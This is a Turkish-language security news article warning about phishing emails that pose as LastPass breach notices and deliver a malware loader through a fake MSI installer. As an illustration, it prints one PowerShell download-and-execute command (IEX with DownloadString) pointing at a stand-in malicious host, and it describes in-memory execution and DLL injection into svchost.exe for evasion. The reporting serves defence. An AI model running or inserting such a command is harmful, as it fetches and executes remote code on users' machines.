Kullanıcıları Kötü Amaçlı Yazılım Yüklemeleri İçin Kandırmaya Çalışan Sahte ‘LastPass Hack’ E-postalarına Dikkat Edin

   Ekim 16, 2025  Posted in CyberSecurityNews


Kullanıcıları Kötü Amaçlı Yazılım Yüklemeleri İçin Kandırmaya Çalışan Sahte 'LastPass Hack' E-postalarına Dikkat Edin

Siber güvenlik uzmanları, LastPass’tan gelen ihlal bildirimleri gibi görünen yeni bir kimlik avı e-postası dalgası nedeniyle alarm veriyor.

Bu mesajlar, alıcıları acil bir hesap ihlali konusunda uyarıyor ve erişimi yeniden sağlamak için onları bir “güvenlik yaması” indirmeye teşvik ediyor.

Gerçekte, indirilebilir dosya, kimlik bilgilerini toplamak ve ek yükleri dağıtmak için tasarlanmış gelişmiş bir kötü amaçlı yazılım yükleyicisi içerir.

Plan Ekim başından bu yana aktif ve şimdiden birçok kurumsal kullanıcıyı tuzağa düşürdü.

E-postalar, mağdurları meşru alanlara yönlendiren şirket logoları ve bağlantılarla tamamlanan tanıdık LastPass markasını kullanıyor.

Ancak daha yakından incelendiğinde, kullanıcıları kötü amaçlı çalıştırılabilir dosyaları barındıran, saldırgan tarafından kontrol edilen sunuculara yönlendiren incelikli URL manipülasyonları ortaya çıkar.

google

LastPass analistleri, birden fazla kullanıcının bağlantılara tıkladıktan kısa bir süre sonra beklenmedik oturum açma hataları ve anormal ağ trafiği bildirdiğini gözlemledikten sonra kampanyayı belirledi.

Her kimlik avı e-postası, MSI yükleyicisi olarak gizlenen yürütülebilir dosyayı içeren “LastPass_Security_Update.zip” adlı bir ZIP arşivi ekler.

MSI başlatıldığında, kullanıcının AppData klasörüne bir PowerShell betiği bırakır ve bunu zamanlanmış bir görev aracılığıyla yürütür.

Bu komut dosyası, kurumsal ağlarda tuş günlüğü tutma, ekran görüntüsü yakalama ve yanal hareket etme kapasitesine sahip ikinci aşama veriyi indirmek için uzak bir komuta ve kontrol sunucusuna ulaşır.

Enfeksiyon Mekanizması

Saldırının özü, betiği diske yazmadan yükleyiciyi indiren ve çalıştıran hazırlanmış bir PowerShell komutu etrafında dönüyor. Gizlenmiş komutun bir parçacığı aşağıda gösterilmektedir: –

IEX(New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader.ps1')

Bu tek astarlı kullanımlar IEX İndirilen içeriği doğrudan bellekte yürütmek, çoğu antivirüs çözümünü atlatmak için.

Kimlik avı e-postası (Kaynak – LastPass)

Yükleyici daha sonra bir DLL dosyasını enjekte eder. svchost.exe kalıcılığı korumak ve uygulamanın beyaz listeye alınmasını atlamak için.

Bu kampanya, e-posta orijinalliğini doğrulamanın, çok faktörlü kimlik doğrulamayı kullanmanın ve kurumsal ortamlarda olağandışı PowerShell etkinliğini izlemenin önemini vurguluyor.

Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.

googlehaberler



Source link